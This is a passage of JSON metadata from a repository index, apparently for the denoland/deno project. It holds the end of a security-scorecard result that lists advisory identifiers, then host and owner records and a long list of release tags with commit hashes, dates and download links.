dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"d